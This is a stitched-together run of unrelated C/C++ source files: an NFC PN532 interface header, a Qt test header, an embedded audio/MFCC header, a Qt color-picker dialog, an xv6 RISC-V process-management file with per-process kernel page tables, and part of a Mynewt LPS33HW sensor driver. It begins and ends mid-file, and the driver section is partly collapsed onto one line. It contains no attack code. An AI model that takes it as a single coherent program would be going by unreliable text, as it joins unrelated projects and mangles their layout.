#define REVERSE_BITS_ORDER(b)       b = (b & 0xF0) >> 4 | (b & 0x0F) << 4; \
                                    b = (b & 0xCC) >> 2 | (b & 0x33) << 2; \
                                    b = (b & 0xAA) >> 1 | (b & 0x55) << 1

// Abstract transport for talking to a PN532 NFC chip (implemented for e.g.
// SPI/I2C/HSU elsewhere).
class PN532Interface
{
public:
    virtual void begin() = 0;
    virtual void wakeup() = 0;

    /**
    * @brief    write a command and check ack
    * @param    header  packet header
    * @param    hlen    length of header
    * @param    body    packet body
    * @param    blen    length of body
    * @return   0       success
    *           not 0   failed
    */
    virtual int8_t writeCommand(const uint8_t* header, uint8_t hlen, const uint8_t* body = 0, uint8_t blen = 0) = 0;

    /**
    * @brief    read the response of a command, strip prefix and suffix
    * @param    buf     to contain the response data
    * @param    len     length to read
    * @param    timeout max time to wait, 0 means no timeout
    * @return   >=0     length of response without prefix and suffix
    *           <0      failed to read response
    */
    virtual int16_t readResponse(uint8_t buf[], uint8_t len, uint16_t timeout = 1000) = 0;
};

#endif
#ifndef KAZUCOIN_QT_TEST_ADDRESSBOOKTESTS_H
#define KAZUCOIN_QT_TEST_ADDRESSBOOKTESTS_H

#include <QObject>
#include <QTest>

// QtTest fixture for the address book GUI; the test body lives in the
// corresponding .cpp and is invoked by the Qt test runner via the slot below.
class AddressBookTests : public QObject
{
    Q_OBJECT

private Q_SLOTS:
    void addressBookTests();
};

#endif // KAZUCOIN_QT_TEST_ADDRESSBOOKTESTS_H
#ifndef AUDIOVISUALIZATION_H_
#define AUDIOVISUALIZATION_H_

#include "main.h"
#include "tim.h"
#include "arm_math.h"
#include "ringBuffer.h"
#include "Device.h"
#include "feature_extraction.h"
#include "NN.h"
#include "NN_Detection.h"

/* Buffer/FFT sizing for the audio pipeline.
 * NOTE(review): relationships between these sizes (e.g. FFT size = half the
 * processing buffer) are assumed from the values; confirm in the .c file. */
#define NN_AUDIO_BUFFER_SIZE 3072U
#define AUDIO_PROCESSING_BUFFER_SIZE 2048U
#define AUDIO_PROCESSING_FFT_SIZE 1024U

/* MFCC feature-extraction dimensions. */
#define NN_MFCC_COLUMNS 15U
#define NN_MFCC_COLUMNS_ALT 29U
#define NN_MFCC_COUNT 21U
#define AUDIO_PROCESSING_MFCC_COUNT 30U
#define AUDIO_PROCESSING_MFCC_SAMPLING_FREQUENCY 16000U
#define AUDIO_PROCESSING_MFCC_NYQUIST_FREQUENCY (AUDIO_PROCESSING_MFCC_SAMPLING_FREQUENCY / 2)

/* ms between automatic resets of the tracked maximum volume. */
#define AUDIO_VISUALIZATION_MAX_VOLUME_RESET_PERIOD 30000U

void audioProcessing_Init();
/* Push `size` samples from `source` into the processing ring buffer. */
ringBufferStatus audioProcessing_AddData(int16_t *data, uint32_t size, audioInputState source);
void audioProcessing_ClearBuffer();
void NN_ClearAudioBuffer();
/* Run one processing step; return value semantics defined in the .c file. */
uint8_t audioProcessing_Run();
/* Fast approximation of log10f(x). */
float log10_approx(float x);

#endif
#ifndef COLORPICKER_H
#define COLORPICKER_H

#include <QWidget>
#include <QScopedPointer>
#include <QMap>
#include <QEventLoop>
#include <QPointer>

namespace Ui {
	class ColorPicker;
};

#include "AbstractColorPicker.h"

class EyeDropper;

// Composite color-picker dialog: hosts a set of registered sub-pickers and
// color-space views, plus a screen eye-dropper, and runs modally via exec().
class ColorPicker : public AbstractColorPicker
{
	Q_OBJECT

private:
	// Keyed registry of sub-picker widgets; QPointer so destroyed pickers
	// become null instead of dangling.
	typedef QMap<QString, QPointer<AbstractColorPicker>> PickerMap;

public:
	explicit ColorPicker(QWidget* parent = 0);
	~ColorPicker();

	// Blocks in a local event loop until the dialog is closed.
	void exec();

protected:
	void RegisterPicker(const QString& key, AbstractColorPicker* picker);
	void RegisterColorSpace(const QString& key, AbstractColorPicker* picker);

	void SetColorInternal(const QColor& c) override;

private slots:
	// Live color change while dragging / editing.
	void OnChanging(const QColor& c);
	// Committed color change.
	void OnChanged(const QColor& c);
	void OnDropperChanged(const QColor& c);
	void OnDropper();

private:
	// Propagate c to all pickers except `source` (the originator).
	void UpdateControls(const QColor& c, AbstractColorPicker* source = NULL);
	void ConnectPicker(AbstractColorPicker* picker);

	void closeEvent(QCloseEvent* e);

	QScopedPointer<Ui::ColorPicker> ui;
	QPointer<EyeDropper> dropper;
	PickerMap pickers;
	PickerMap colorSpaces;
	QEventLoop modalLoop;  // drives the modal exec() loop
};

#endif // COLORPICKER_H
#include "types.h"
#include "param.h"
#include "memlayout.h"
#include "riscv.h"
#include "spinlock.h"
#include "proc.h"
#include "defs.h"

struct cpu cpus[NCPU];

struct proc proc[NPROC];

struct proc *initproc;

int nextpid = 1;
struct spinlock pid_lock;   // serializes pid allocation in allocpid()

extern void forkret(void);
static void wakeup1(struct proc *chan);
static void freeproc(struct proc *p);

extern char trampoline[]; // trampoline.S

// initialize the proc table at boot time.
void
procinit(void)
{
  struct proc *p;

  initlock(&pid_lock, "nextpid");
  for(p = proc; p < &proc[NPROC]; p++) {
      initlock(&p->lock, "proc");

      // Allocate a page for the process's kernel stack.
      // Map it high in memory, followed by an invalid
      // guard page.
      char *pa = kalloc();
      if(pa == 0)
        panic("kalloc");
      uint64 va = KSTACK((int) (p - proc));
      kvmmap(va, (uint64)pa, PGSIZE, PTE_R | PTE_W);
      p->kstack = va;
  }
  // Reload the hart's page table so the new kernel-stack mappings take effect.
  kvminithart();
}

// Must be called with interrupts disabled,
// to prevent race with process being moved
// to a different CPU.
int
cpuid()
{
  int id = r_tp();
  return id;
}

// Return this CPU's cpu struct.
// Interrupts must be disabled.
struct cpu*
mycpu(void) {
  int id = cpuid();
  struct cpu *c = &cpus[id];
  return c;
}

// Return the current struct proc *, or zero if none.
struct proc*
myproc(void) {
  // push_off/pop_off keep us on the same CPU while reading c->proc.
  push_off();
  struct cpu *c = mycpu();
  struct proc *p = c->proc;
  pop_off();
  return p;
}

// Allocate a unique process id.
int
allocpid() {
  int pid;

  acquire(&pid_lock);
  pid = nextpid;
  nextpid = nextpid + 1;
  release(&pid_lock);

  return pid;
}

// Look in the process table for an UNUSED proc.
// If found, initialize state required to run in the kernel,
// and return with p->lock held.
// If there are no free procs, or a memory allocation fails, return 0.
static struct proc*
allocproc(void)
{
  struct proc *p;

  for(p = proc; p < &proc[NPROC]; p++) {
    acquire(&p->lock);
    if(p->state == UNUSED) {
      goto found;
    } else {
      release(&p->lock);
    }
  }
  return 0;

found:
  p->pid = allocpid();

  // Allocate a trapframe page.
  if((p->trapframe = (struct trapframe *)kalloc()) == 0){
    release(&p->lock);
    return 0;
  }

  // Per-process kernel page table (presumably mirroring the global kernel
  // mappings). NOTE(review): the return value is not checked for 0 —
  // confirm kvmpgmake() panics on allocation failure rather than returning 0.
  p->kpagetable = kvmpgmake();

  // An empty user page table.
  p->pagetable = proc_pagetable(p);
  if(p->pagetable == 0){
    freeproc(p);
    release(&p->lock);
    return 0;
  }

  // Set up new context to start executing at forkret,
  // which returns to user space.
  memset(&p->context, 0, sizeof(p->context));
  p->context.ra = (uint64)forkret;
  p->context.sp = p->kstack + PGSIZE;

  return p;
}

// free a proc structure and the data hanging from it,
// including user pages.
// p->lock must be held.
static void
freeproc(struct proc *p)
{
  if(p->trapframe)
    kfree((void*)p->trapframe);
  p->trapframe = 0;
  if(p->pagetable)
    proc_freepagetable(p->pagetable, p->sz);
  p->pagetable = 0;
  // Release the per-process kernel page table as well.
  if(p->kpagetable)
    kvmpgfree(p->kpagetable);
  p->kpagetable = 0;
  p->sz = 0;
  p->pid = 0;
  p->parent = 0;
  p->name[0] = 0;
  p->chan = 0;
  p->killed = 0;
  p->xstate = 0;
  p->state = UNUSED;
}

// Create a user page table for a given process,
// with no user memory, but with trampoline pages.
pagetable_t
proc_pagetable(struct proc *p)
{
  pagetable_t pagetable;

  // An empty page table.
  pagetable = uvmcreate();
  if(pagetable == 0)
    return 0;

  // map the trampoline code (for system call return)
  // at the highest user virtual address.
  // only the supervisor uses it, on the way
  // to/from user space, so not PTE_U.
  if(mappages(pagetable, TRAMPOLINE, PGSIZE,
              (uint64)trampoline, PTE_R | PTE_X) < 0){
    uvmfree(pagetable, 0);
    return 0;
  }

  // map the trapframe just below TRAMPOLINE, for trampoline.S.
  if(mappages(pagetable, TRAPFRAME, PGSIZE,
              (uint64)(p->trapframe), PTE_R | PTE_W) < 0){
    uvmunmap(pagetable, TRAMPOLINE, 1, 0);
    uvmfree(pagetable, 0);
    return 0;
  }

  return pagetable;
}

// Free a process's page table, and free the
// physical memory it refers to.
void
proc_freepagetable(pagetable_t pagetable, uint64 sz)
{
  uvmunmap(pagetable, TRAMPOLINE, 1, 0);
  uvmunmap(pagetable, TRAPFRAME, 1, 0);
  uvmfree(pagetable, sz);
}

// a user program that calls exec("/init")
// od -t xC initcode
uchar initcode[] = {
  0x17, 0x05, 0x00, 0x00, 0x13, 0x05, 0x45, 0x02,
  0x97, 0x05, 0x00, 0x00, 0x93, 0x85, 0x35, 0x02,
  0x93, 0x08, 0x70, 0x00, 0x73, 0x00, 0x00, 0x00,
  0x93, 0x08, 0x20, 0x00, 0x73, 0x00, 0x00, 0x00,
  0xef, 0xf0, 0x9f, 0xff, 0x2f, 0x69, 0x6e, 0x69,
  0x74, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00
};

// Set up first user process.
void
userinit(void)
{
  struct proc *p;

  p = allocproc();
  initproc = p;

  // allocate one user page and copy init's instructions
  // and data into it.
  uvminit(p->pagetable, initcode, sizeof(initcode));
  p->sz = PGSIZE;
  // Mirror the user mappings [0, p->sz) into the per-process kernel page
  // table — NOTE(review): exact contract of kvmmpuser() assumed; verify.
  kvmmpuser(p->pagetable, p->kpagetable,p->sz,0);

  // prepare for the very first "return" from kernel to user.
  p->trapframe->epc = 0;      // user program counter
  p->trapframe->sp = PGSIZE;  // user stack pointer

  safestrcpy(p->name, "initcode", sizeof(p->name));
  p->cwd = namei("/");

  p->state = RUNNABLE;

  release(&p->lock);
}

// Grow or shrink user memory by n bytes.
// Return 0 on success, -1 on failure.
int
growproc(int n)
{
  uint sz;
  struct proc *p = myproc();

  // Refuse growth past PLIC so user addresses never collide with the
  // device mappings that also live in the per-process kernel page table.
  if(p->sz + n >= PLIC)
	  return -1;
  sz = p->sz;
  if(n > 0){
    if((sz = uvmalloc(p->pagetable, sz, sz + n)) == 0) {
      return -1;
    }
  } else if(n < 0){
    sz = uvmdealloc(p->pagetable, sz, sz + n);
  }
  // Re-sync the user region into the kernel page table after the resize.
  kvmmpuser(p->pagetable, p->kpagetable,sz,p->sz);
  p->sz = sz;
  return 0;
}

// Create a new process, copying the parent.
// Sets up child kernel stack to return as if from fork() system call.
int
fork(void)
{
  int i, pid;
  struct proc *np;
  struct proc *p = myproc();

  // Allocate process.
  if((np = allocproc()) == 0){
    return -1;
  }

  // Copy user memory from parent to child.
  if(uvmcopy(p->pagetable, np->pagetable, p->sz) < 0){
    freeproc(np);
    release(&np->lock);
    return -1;
  }
  np->sz = p->sz;

  np->parent = p;

  // copy saved user registers.
  *(np->trapframe) = *(p->trapframe);

  // Cause fork to return 0 in the child.
  np->trapframe->a0 = 0;

  // increment reference counts on open file descriptors.
  for(i = 0; i < NOFILE; i++)
    if(p->ofile[i])
      np->ofile[i] = filedup(p->ofile[i]);
  np->cwd = idup(p->cwd);

  safestrcpy(np->name, p->name, sizeof(p->name));

  pid = np->pid;

  np->state = RUNNABLE;
  // Mirror the child's user mappings into its kernel page table.
  kvmmpuser(np->pagetable, np->kpagetable,np->sz,0);

  release(&np->lock);

  return pid;
}

// Pass p's abandoned children to init.
// Caller must hold p->lock.
void
reparent(struct proc *p)
{
  struct proc *pp;

  for(pp = proc; pp < &proc[NPROC]; pp++){
    // this code uses pp->parent without holding pp->lock.
    // acquiring the lock first could cause a deadlock
    // if pp or a child of pp were also in exit()
    // and about to try to lock p.
    if(pp->parent == p){
      // pp->parent can't change between the check and the acquire()
      // because only the parent changes it, and we're the parent.
      acquire(&pp->lock);
      pp->parent = initproc;
      // we should wake up init here, but that would require
      // initproc->lock, which would be a deadlock, since we hold
      // the lock on one of init's children (pp). this is why
      // exit() always wakes init (before acquiring any locks).
      release(&pp->lock);
    }
  }
}

// Exit the current process.  Does not return.
// An exited process remains in the zombie state
// until its parent calls wait().
void
exit(int status)
{
  struct proc *p = myproc();

  if(p == initproc)
    panic("init exiting");

  // Close all open files.
  for(int fd = 0; fd < NOFILE; fd++){
    if(p->ofile[fd]){
      struct file *f = p->ofile[fd];
      fileclose(f);
      p->ofile[fd] = 0;
    }
  }

  begin_op();
  iput(p->cwd);
  end_op();
  p->cwd = 0;

  // we might re-parent a child to init. we can't be precise about
  // waking up init, since we can't acquire its lock once we've
  // acquired any other proc lock. so wake up init whether that's
  // necessary or not. init may miss this wakeup, but that seems
  // harmless.
  acquire(&initproc->lock);
  wakeup1(initproc);
  release(&initproc->lock);

  // grab a copy of p->parent, to ensure that we unlock the same
  // parent we locked. in case our parent gives us away to init while
  // we're waiting for the parent lock. we may then race with an
  // exiting parent, but the result will be a harmless spurious wakeup
  // to a dead or wrong process; proc structs are never re-allocated
  // as anything else.
  acquire(&p->lock);
  struct proc *original_parent = p->parent;
  release(&p->lock);

  // we need the parent's lock in order to wake it up from wait().
  // the parent-then-child rule says we have to lock it first.
  acquire(&original_parent->lock);

  acquire(&p->lock);

  // Give any children to init.
  reparent(p);

  // Parent might be sleeping in wait().
  wakeup1(original_parent);

  p->xstate = status;
  p->state = ZOMBIE;

  release(&original_parent->lock);

  // Jump into the scheduler, never to return.
  sched();
  panic("zombie exit");
}

// Wait for a child process to exit and return its pid.
// Return -1 if this process has no children.
int
wait(uint64 addr)
{
  struct proc *np;
  int havekids, pid;
  struct proc *p = myproc();

  // hold p->lock for the whole time to avoid lost
  // wakeups from a child's exit().
  acquire(&p->lock);

  for(;;){
    // Scan through table looking for exited children.
    havekids = 0;
    for(np = proc; np < &proc[NPROC]; np++){
      // this code uses np->parent without holding np->lock.
      // acquiring the lock first would cause a deadlock,
      // since np might be an ancestor, and we already hold p->lock.
      if(np->parent == p){
        // np->parent can't change between the check and the acquire()
        // because only the parent changes it, and we're the parent.
        acquire(&np->lock);
        havekids = 1;
        if(np->state == ZOMBIE){
          // Found one.
          pid = np->pid;
          // Copy the exit status out to the caller-supplied address
          // (addr == 0 means the caller doesn't want it).
          if(addr != 0 && copyout(p->pagetable, addr, (char *)&np->xstate,
                                  sizeof(np->xstate)) < 0) {
            release(&np->lock);
            release(&p->lock);
            return -1;
          }
          freeproc(np);
          release(&np->lock);
          release(&p->lock);
          return pid;
        }
        release(&np->lock);
      }
    }

    // No point waiting if we don't have any children.
    if(!havekids || p->killed){
      release(&p->lock);
      return -1;
    }

    // Wait for a child to exit.
    sleep(p, &p->lock);  //DOC: wait-sleep
  }
}

// Per-CPU process scheduler.
// Each CPU calls scheduler() after setting itself up.
// Scheduler never returns.  It loops, doing:
//  - choose a process to run.
//  - swtch to start running that process.
//  - eventually that process transfers control
//    via swtch back to the scheduler.
void
scheduler(void)
{
  struct proc *p;
  struct cpu *c = mycpu();

  c->proc = 0;
  for(;;){
    // Avoid deadlock by ensuring that devices can interrupt.
    intr_on();

    int found = 0;
    for(p = proc; p < &proc[NPROC]; p++) {
      acquire(&p->lock);
      if(p->state == RUNNABLE) {
        // Switch to chosen process.  It is the process's job
        // to release its lock and then reacquire it
        // before jumping back to us.
        p->state = RUNNING;
        c->proc = p;
        // Install the process's kernel page table before running it,
        // and flush stale TLB entries.
        w_satp(MAKE_SATP(p->kpagetable));
        sfence_vma();
        swtch(&c->context, &p->context);
        // Back in the scheduler: restore the global kernel page table.
        kvminithart();

        // Process is done running for now.
        // It should have changed its p->state before coming back.
        c->proc = 0;

        found = 1;
      }
      release(&p->lock);
    }
#if !defined (LAB_FS)
    if(found == 0) {
      intr_on();
      asm volatile("wfi");
    }
#else
    ;
#endif
  }
}

// Switch to scheduler.  Must hold only p->lock
// and have changed proc->state. Saves and restores
// intena because intena is a property of this
// kernel thread, not this CPU. It should
// be proc->intena and proc->noff, but that would
// break in the few places where a lock is held but
// there's no process.
void
sched(void)
{
  int intena;
  struct proc *p = myproc();

  if(!holding(&p->lock))
    panic("sched p->lock");
  if(mycpu()->noff != 1)
    panic("sched locks");
  if(p->state == RUNNING)
    panic("sched running");
  if(intr_get())
    panic("sched interruptible");

  intena = mycpu()->intena;
  swtch(&p->context, &mycpu()->context);
  mycpu()->intena = intena;
}

// Give up the CPU for one scheduling round.
void
yield(void)
{
  struct proc *p = myproc();
  acquire(&p->lock);
  p->state = RUNNABLE;
  sched();
  release(&p->lock);
}

// A fork child's very first scheduling by scheduler()
// will swtch to forkret.
void
forkret(void)
{
  static int first = 1;

  // Still holding p->lock from scheduler.
  release(&myproc()->lock);

  if (first) {
    // File system initialization must be run in the context of a
    // regular process (e.g., because it calls sleep), and thus cannot
    // be run from main().
    first = 0;
    fsinit(ROOTDEV);
  }

  usertrapret();
}

// Atomically release lock and sleep on chan.
// Reacquires lock when awakened.
void
sleep(void *chan, struct spinlock *lk)
{
  struct proc *p = myproc();
  
  // Must acquire p->lock in order to
  // change p->state and then call sched.
  // Once we hold p->lock, we can be
  // guaranteed that we won't miss any wakeup
  // (wakeup locks p->lock),
  // so it's okay to release lk.
  if(lk != &p->lock){  //DOC: sleeplock0
    acquire(&p->lock);  //DOC: sleeplock1
    release(lk);
  }

  // Go to sleep.
  p->chan = chan;
  p->state = SLEEPING;

  sched();

  // Tidy up.
  p->chan = 0;

  // Reacquire original lock.
  if(lk != &p->lock){
    release(&p->lock);
    acquire(lk);
  }
}

// Wake up all processes sleeping on chan.
// Must be called without any p->lock.
void
wakeup(void *chan)
{
  struct proc *p;

  for(p = proc; p < &proc[NPROC]; p++) {
    acquire(&p->lock);
    if(p->state == SLEEPING && p->chan == chan) {
      p->state = RUNNABLE;
    }
    release(&p->lock);
  }
}

// Wake up p if it is sleeping in wait(); used by exit().
// Caller must hold p->lock.
static void
wakeup1(struct proc *p)
{
  if(!holding(&p->lock))
    panic("wakeup1");
  // A process waiting in wait() sleeps on its own proc struct (chan == p).
  if(p->chan == p && p->state == SLEEPING) {
    p->state = RUNNABLE;
  }
}

// Kill the process with the given pid.
// The victim won't exit until it tries to return
// to user space (see usertrap() in trap.c).
int
kill(int pid)
{
  struct proc *p;

  for(p = proc; p < &proc[NPROC]; p++){
    acquire(&p->lock);
    if(p->pid == pid){
      p->killed = 1;
      if(p->state == SLEEPING){
        // Wake process from sleep().
        p->state = RUNNABLE;
      }
      release(&p->lock);
      return 0;
    }
    release(&p->lock);
  }
  return -1;
}

// Copy to either a user address, or kernel address,
// depending on usr_dst.
// Returns 0 on success, -1 on error.
int
either_copyout(int user_dst, uint64 dst, void *src, uint64 len)
{
  struct proc *p = myproc();
  if(user_dst){
    return copyout(p->pagetable, dst, src, len);
  } else {
    memmove((char *)dst, src, len);
    return 0;
  }
}

// Copy from either a user address, or kernel address,
// depending on usr_src.
// Returns 0 on success, -1 on error.
int
either_copyin(void *dst, int user_src, uint64 src, uint64 len)
{
  struct proc *p = myproc();
  if(user_src){
    return copyin(p->pagetable, dst, src, len);
  } else {
    memmove(dst, (char*)src, len);
    return 0;
  }
}

// Print a process listing to console.  For debugging.
// Runs when user types ^P on console.
// No lock to avoid wedging a stuck machine further.
void
procdump(void)
{
  static char *states[] = {
  [UNUSED]    "unused",
  [SLEEPING]  "sleep ",
  [RUNNABLE]  "runble",
  [RUNNING]   "run   ",
  [ZOMBIE]    "zombie"
  };
  struct proc *p;
  char *state;

  printf("\n");
  for(p = proc; p < &proc[NPROC]; p++){
    if(p->state == UNUSED)
      continue;
    if(p->state >= 0 && p->state < NELEM(states) && states[p->state])
      state = states[p->state];
    else
      state = "???";
    printf("%d %s %s", p->pid, state, p->name);
    printf("\n");
  }
}
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * resarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ #include <string.h> #include <errno.h> #include <assert.h> #include <math.h> #include "os/mynewt.h" #include "hal/hal_i2c.h" #include "hal/hal_spi.h" #include "hal/hal_gpio.h" #include "sensor/sensor.h" #include "sensor/pressure.h" #include "sensor/temperature.h" #include "lps33hw/lps33hw.h" #include "lps33hw_priv.h" #include "log/log.h" #include "stats/stats.h" static struct hal_spi_settings spi_lps33hw_settings = { .data_order = HAL_SPI_MSB_FIRST, .data_mode = HAL_SPI_MODE3, .baudrate = 4000, .word_size = HAL_SPI_WORD_SIZE_8BIT, }; /* Define the stats section and records */ STATS_SECT_START(lps33hw_stat_section) STATS_SECT_ENTRY(read_errors) STATS_SECT_ENTRY(write_errors) STATS_SECT_END /* Define stat names for querying */ STATS_NAME_START(lps33hw_stat_section) STATS_NAME(lps33hw_stat_section, read_errors) STATS_NAME(lps33hw_stat_section, write_errors) STATS_NAME_END(lps33hw_stat_section) /* Global variable used to hold stats data */ STATS_SECT_DECL(lps33hw_stat_section) g_lps33hwstats; #define LOG_MODULE_LPS33HW (33) #define LPS33HW_INFO(...) LOG_INFO(&_log, LOG_MODULE_LPS33HW, __VA_ARGS__) #define LPS33HW_ERR(...) 
LOG_ERROR(&_log, LOG_MODULE_LPS33HW, __VA_ARGS__) static struct log _log; #define LPS33HW_PRESS_OUT_DIV (40.96) #define LPS33HW_TEMP_OUT_DIV (100.0) #define LPS33HW_PRESS_THRESH_DIV (16) /* Exports for the sensor API */ static int lps33hw_sensor_read(struct sensor *, sensor_type_t, sensor_data_func_t, void *, uint32_t); static int lps33hw_sensor_get_config(struct sensor *, sensor_type_t, struct sensor_cfg *); static int lps33hw_sensor_set_config(struct sensor *, void *); static int lps33hw_sensor_set_trigger_thresh(struct sensor *sensor, sensor_type_t sensor_type, struct sensor_type_traits *stt); static int lps33hw_sensor_handle_interrupt(struct sensor *sensor); static int lps33hw_sensor_clear_low_thresh(struct sensor *sensor, sensor_type_t type); static int lps33hw_sensor_clear_high_thresh(struct sensor *sensor, sensor_type_t type); static const struct sensor_driver g_lps33hw_sensor_driver = { .sd_read = lps33hw_sensor_read, .sd_get_config = lps33hw_sensor_get_config, .sd_set_config = lps33hw_sensor_set_config, .sd_set_trigger_thresh = lps33hw_sensor_set_trigger_thresh, .sd_handle_interrupt = lps33hw_sensor_handle_interrupt, .sd_clear_low_trigger_thresh = lps33hw_sensor_clear_low_thresh, .sd_clear_high_trigger_thresh = lps33hw_sensor_clear_high_thresh }; /* * Converts pressure value in pascals to a value found in the pressure * threshold register of the device. * * @param Pressure value in pascals. * * @return Pressure value to write to the threshold registers. */ static uint16_t lps33hw_pa_to_threshold_reg(float pa) { /* Threshold is unsigned. */ if (pa < 0) { return 0; } else if (pa == INFINITY) { return 0xffff; } return pa * LPS33HW_PRESS_THRESH_DIV; } /* * Converts pressure value in pascals to a value found in the pressure * reference register of the device. * * @param Pressure value in pascals. * * @return Pressure value to write to the reference registers. 
*/ static int32_t lps33hw_pa_to_reg(float pa) { if (pa == INFINITY) { return 0x007fffff; } return (int32_t)(pa * LPS33HW_PRESS_OUT_DIV); } /* * Converts pressure read from the device output registers to a value in * pascals. * * @param Pressure value read from the output registers. * * @return Pressure value in pascals. */ static float lps33hw_reg_to_pa(int32_t reg) { return reg / LPS33HW_PRESS_OUT_DIV; } /* * Converts temperature read from the device output registers to a value in * degrees C. * * @param Temperature value read from the output registers. * * @return Temperature value in degrees C. */ static float lps33hw_reg_to_degc(int16_t reg) { return reg / LPS33HW_TEMP_OUT_DIV; } /** * Writes a single byte to the specified register using i2c * interface * * @param The sensor interface * @param The register address to write to * @param The value to write * * @return 0 on success, non-zero error on failure. */ static int lps33hw_i2c_set_reg(struct sensor_itf *itf, uint8_t reg, uint8_t value) { int rc; uint8_t payload[2] = { reg, value }; struct hal_i2c_master_data data_struct = { .address = itf->si_addr, .len = 2, .buffer = payload }; rc = hal_i2c_master_write(itf->si_num, &data_struct, OS_TICKS_PER_SEC / 10, 1); if (rc) { LPS33HW_ERR("Failed to write to 0x%02X:0x%02X with value 0x%02X\n", itf->si_addr, reg, value); STATS_INC(g_lps33hwstats, read_errors); } return rc; } /** * Writes a single byte to the specified register using SPI * interface * * @param The sensor interface * @param The register address to write to * @param The value to write * * @return 0 on success, non-zero error on failure. 
 */
static int
lps33hw_spi_set_reg(struct sensor_itf *itf, uint8_t reg, uint8_t value)
{
    int rc;

    /* Select the device */
    hal_gpio_write(itf->si_cs_pin, 0);

    /* Send the register address w/write command */
    rc = hal_spi_tx_val(itf->si_num, reg & ~LPS33HW_SPI_READ_CMD_BIT);
    /* 0xFFFF is the HAL's transfer-error sentinel. */
    if (rc == 0xFFFF) {
        rc = SYS_EINVAL;
        LPS33HW_ERR("SPI_%u register write failed addr:0x%02X\n",
                    itf->si_num, reg);
        STATS_INC(g_lps33hwstats, write_errors);
        goto err;
    }

    /* Write data */
    rc = hal_spi_tx_val(itf->si_num, value);
    if (rc == 0xFFFF) {
        rc = SYS_EINVAL;
        LPS33HW_ERR("SPI_%u write failed addr:0x%02X\n",
                    itf->si_num, reg);
        STATS_INC(g_lps33hwstats, write_errors);
        goto err;
    }
    rc = 0;

err:
    /* De-select the device */
    hal_gpio_write(itf->si_cs_pin, 1);

    /* ~30 ms pause after the write (+1 tick to round up).
     * NOTE(review): presumably a device settle time; confirm against the
     * LPS33HW datasheet — the I2C write path has no equivalent delay. */
    os_time_delay((OS_TICKS_PER_SEC * 30)/1000 + 1);

    return rc;
}

/**
 * Writes a single byte to the specified register using specified
 * interface
 *
 * @param The sensor interface
 * @param The register address to write to
 * @param The value to write
 *
 * @return 0 on success, non-zero error on failure.
 */
static int
lps33hw_set_reg(struct sensor_itf *itf, uint8_t reg, uint8_t value)
{
    int rc;

    /* Dispatch on the configured bus type. */
    if (itf->si_type == SENSOR_ITF_I2C) {
        rc = lps33hw_i2c_set_reg(itf, reg, value);
    } else {
        rc = lps33hw_spi_set_reg(itf, reg, value);
    }

    return rc;
}

/**
 *
 * Read bytes from the specified register using SPI interface
 *
 * @param The sensor interface
 * @param The register address to read from
 * @param The number of bytes to read
 * @param Pointer to where the register value should be written
 *
 * @return 0 on success, non-zero error on failure.
 */
static int
lps33hw_spi_get_regs(struct sensor_itf *itf, uint8_t reg, uint8_t size,
    uint8_t *buffer)
{
    int i;
    uint16_t retval;
    int rc;
    rc = 0;

    /* Select the device */
    hal_gpio_write(itf->si_cs_pin, 0);

    /* Send the address */
    retval = hal_spi_tx_val(itf->si_num, reg | LPS33HW_SPI_READ_CMD_BIT);

    /* 0xFFFF is the HAL's transfer-error sentinel. */
    if (retval == 0xFFFF) {
        rc = SYS_EINVAL;
        LPS33HW_ERR("SPI_%u register write failed addr:0x%02X\n",
                    itf->si_num, reg);
        STATS_INC(g_lps33hwstats, read_errors);
        goto err;
    }

    /* Clock out dummy bytes; each transfer returns one byte of data. */
    for (i = 0; i < size; i++) {
        /* Read data */
        retval = hal_spi_tx_val(itf->si_num, 0);
        if (retval == 0xFFFF) {
            rc = SYS_EINVAL;
            LPS33HW_ERR("SPI_%u read failed addr:0x%02X\n",
                        itf->si_num, reg);
            STATS_INC(g_lps33hwstats, read_errors);
            goto err;
        }
        buffer[i] = retval;
    }

    rc = 0;

err:
    /* De-select the device */
    hal_gpio_write(itf->si_cs_pin, 1);

    return rc;
}

/**
 * Read bytes from the specified register using i2c interface
 *
 * @param The sensor interface
 * @param The register address to read from
 * @param The number of bytes to read
 * @param Pointer to where the register value should be written
 *
 * @return 0 on success, non-zero error on failure.
 */
static int
lps33hw_i2c_get_regs(struct sensor_itf *itf, uint8_t reg, uint8_t size,
    uint8_t *buffer)
{
    int rc;

    struct hal_i2c_master_data data_struct = {
        .address = itf->si_addr,
        .len = 1,
        .buffer = &reg
    };

    /* Register write: send the register address to read from. */
    rc = hal_i2c_master_write(itf->si_num, &data_struct,
        OS_TICKS_PER_SEC / 10, 1);
    if (rc) {
        LPS33HW_ERR("I2C access failed at address 0x%02X\n", itf->si_addr);
        STATS_INC(g_lps33hwstats, write_errors);
        return rc;
    }

    /* Read: timeout scales with the number of bytes requested. */
    data_struct.len = size;
    data_struct.buffer = buffer;
    rc = hal_i2c_master_read(itf->si_num, &data_struct,
        (OS_TICKS_PER_SEC / 10) * size, 1);
    if (rc) {
        LPS33HW_ERR("Failed to read from 0x%02X:0x%02X\n", itf->si_addr, reg);
        STATS_INC(g_lps33hwstats, read_errors);
    }

    return rc;
}

/**
 * Read bytes from the specified register using specified interface
 *
 * @param The sensor interface
 * @param The register address to read from
 * @param The number of bytes to read
 * @param Pointer to where the register value should be written
 *
 * @return 0 on success, non-zero error on failure.
